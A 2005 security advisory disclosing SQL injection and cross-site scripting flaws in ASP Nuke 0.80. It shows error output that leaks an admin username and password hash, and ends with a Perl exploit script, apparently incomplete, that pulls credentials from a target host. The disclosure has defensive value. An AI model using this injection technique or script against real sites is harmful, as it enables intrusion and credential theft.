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[NT] ASP Nuke Multiple SQL Injection and XSS Vulnerability

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From: SecuriTeam <>
To: [email protected]
Date: 25 Apr 2005 15:11:31 +0200
Subject: [NT] ASP Nuke Multiple SQL Injection and XSS Vulnerability
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  ASP Nuke Multiple SQL Injection and XSS Vulnerability


 <>; ASP Nuke is "an open-source software 
application for running a community-based web site on a web server".

The lack of parameter filtering allows attackers to steal information and 
modify/add/delete or just view information from ASP Nuke's database.


Vulnerable Systems:
 * ASP Nuke version 0.80

SQL Injection:
ASP Nuke has many pages that are vulnerable to SQL Injections.

Example #1:
The following URL can be used to trigger an SQL injection vulnerability in 
the comments.asp page: 

Error # -2147217900 (0x80040E14)
Unclosed quotation mark before the character string 'SQL_INJECTION AND 
tsk.Active <> 0 AND tsk.Archive = 0'.
SELECT tsk.TaskID, tsk.Title, tsk.Comments, tsk.PctComplete, 
usr.FirstName, usr.LastName, pri.PriorityName, sta.StatusName, 0 As 
CommentCount, tsk.Created FROM tblTask tsk INNER JOIN tblUser usr ON 
tsk.UserID = usr.UserID INNER JOIN tblTaskPriority pri ON pri.PriorityID = 
tsk.PriorityID INNER JOIN tblTaskStatus sta ON sta.StatusID = tsk.StatusID 
WHERE tsk.TaskID = 'SQL_INJECTION AND tsk.Active <> 0 AND tsk.Archive = 0

To the get the username:

This would result in:
Error # -2147217913 (0x80040E07)
Syntax error converting the varchar value 'admin' to a column of data type 
SELECT tsk.TaskID, tsk.Title, tsk.Comments, tsk.PctComplete, 
usr.FirstName, usr.LastName, pri.PriorityName, sta.StatusName, 0 As 
CommentCount, tsk.Created FROM tblTask tsk INNER JOIN tblUser usr ON 
tsk.UserID = usr.UserID INNER JOIN tblTaskPriority pri ON pri.PriorityID = 
tsk.PriorityID INNER JOIN tblTaskStatus sta ON sta.StatusID = tsk.StatusID 
WHERE tsk.TaskID = Username-- AND tsk.Active <> 0 AND tsk.Archive = 0

With "admin" being the username

To the get the password:

This would result in:
Error # -2147217913 (0x80040E07)
Syntax error converting the varchar value 
'f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015' to a 
column of data type int.
SELECT tsk.TaskID, tsk.Title, tsk.Comments, tsk.PctComplete, 
usr.FirstName, usr.LastName, pri.PriorityName, sta.StatusName, 0 As 
CommentCount, tsk.Created FROM tblTask tsk INNER JOIN tblUser usr ON 
tsk.UserID = usr.UserID INNER JOIN tblTaskPriority pri ON pri.PriorityID = 
tsk.PriorityID INNER JOIN tblTaskStatus sta ON sta.StatusID = tsk.StatusID 
WHERE tsk.TaskID = Password-- AND tsk.Active <> 0 AND tsk.Archive = 0

With "f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015" 
being the password hash encrypted in SHA 256

Example #2:
The following URL can be used to trigger an SQL injection vulnerability in 
the detail.asp page: 

Error # -2147217900 (0x80040E14)
Unclosed quotation mark before the character string 'SQL_INJECTION AND 
tsk.Active <> 0 AND tsk.Archive = 0'.
SELECT tsk.TaskID, tsk.Title, tsk.Comments, usr.FirstName, usr.LastName, 
pri.PriorityName, sta.StatusName, 0 As CommentCount, tsk.Created FROM 
tblTask tsk INNER JOIN tblUser usr ON tsk.UserID = usr.UserID INNER JOIN 
tblTaskPriority pri ON pri.PriorityID = tsk.PriorityID INNER JOIN 
tblTaskStatus sta ON sta.StatusID = tsk.StatusID WHERE tsk.TaskID = 
'SQL_INJECTION AND tsk.Active <> 0 AND tsk.Archive = 0

To the get the username:

This would result in:
Error # -2147217913 (0x80040E07)
Syntax error converting the varchar value 'admin' to a column of data type 
SELECT tsk.TaskID, tsk.Title, tsk.Comments, usr.FirstName, usr.LastName, 
pri.PriorityName, sta.StatusName, 0 As CommentCount, tsk.Created FROM 
tblTask tsk INNER JOIN tblUser usr ON tsk.UserID = usr.UserID INNER JOIN 
tblTaskPriority pri ON pri.PriorityID = tsk.PriorityID INNER JOIN 
tblTaskStatus sta ON sta.StatusID = tsk.StatusID WHERE tsk.TaskID = 
Username-- AND tsk.Active <> 0 AND tsk.Archive = 0

With "admin" being the username

To the get the password:

This would result in:
Error # -2147217913 (0x80040E07)
Syntax error converting the varchar value 
'f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015' to a 
column of data type int.

SELECT tsk.TaskID, tsk.Title, tsk.Comments, usr.FirstName, usr.LastName, 
pri.PriorityName, sta.StatusName, 0 As CommentCount, tsk.Created FROM 
tblTask tsk INNER JOIN tblUser usr ON tsk.UserID = usr.UserID INNER JOIN 
tblTaskPriority pri ON pri.PriorityID = tsk.PriorityID INNER JOIN 
tblTaskStatus sta ON sta.StatusID = tsk.StatusID WHERE tsk.TaskID = 
Password-- AND tsk.Active <> 0 AND tsk.Archive = 0

With "f2349ef3f76a2d980586cb945a1973ba8e9579a9c9411c043be85583f444e015" 
being the password hash encrypted in SHA 256

Example #3:
The following URL can be used to trigger an SQL injection vulnerability in 
the article.asp page: 

Error # -2147217900 (0x80040E14)
Unclosed quotation mark before the character string 'SQL_INJECTION AND 
art.Active <> 0 AND art.Archive = 0'.
SELECT art.ArticleID, art.Title, art.ArticleBody, auth.FirstName, 
auth.LastName, cat.CategoryName, art.CommentCount, art.Created FROM 
tblArticle art INNER JOIN tblArticleAuthor auth ON art.AuthorID = 
auth.AuthorID INNER JOIN tblArticleToCategory atc ON atc.ArticleID = 
art.ArticleID INNER JOIN tblArticleCategory cat ON atc.CategoryID = 
cat.CategoryID WHERE art.ArticleID = 'SQL_INJECTION AND art.Active <> 0 
AND art.Archive = 0

Cross Site Scripting:
The following URL can be used to trigger the cross site scripting 
vulnerability found in the profile.asp page:

Exploit (Username and Password retrieval):

use IO::Socket;
use Getopt::Std;
print "[x]ASP NUKE 0.80 and below Comments.asp Sql Injection Exploit\n";
print "[x]By Diabolic Crab\n";
print "[x]\n\n";


$opt_p ||= 80;

if(!$opt_h) {
    die("[x] Usage: $0 -h <host> [-p <port>]\n");

$sqlpass = "/module/support/task/comments.asp?taskid=Password-- 
$sqllogin = "/module/support/task/comments.asp?taskid=Username-- 

print "[x] Host: $opt_h\n";
print "[x] Port: $opt_p\n";

$Q1 = "GET $sqllogin";
$Q1 .= "Host: ".$opt_h."\n\n";

$Q2 = "GET $sqlpass";
$Q2 .= "Host: ".$opt_h."\n\n";

$s = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $opt_h, PeerPort => 
$opt_p) or die("Can't connect!");
$s->recv($usr, 1024);

$s = IO::Socket::INET->new(Proto=>'tcp', PeerAddr => $opt_h, PeerPort => 
$opt_p) or die("Can't connect!");
$s->recv($pass, 1024);

$s = index($usr,"'");
$e = index($usr,"'", $s + 1);
$f = $e - $s - 1;
print "[x]Username in SHA 256 is: ";
print substr($usr, $s + 1, $f);
print "\n";

$s = index($pass,"'");
$e = index($pass,"'", $s + 1);
$f = $e - $s - 1;
print "[x]Password hash in SHA 256 is: ";
print substr($pass, $s + 1, $f);
print "\n";



The information has been provided by  <> 
Diabolic Crab.

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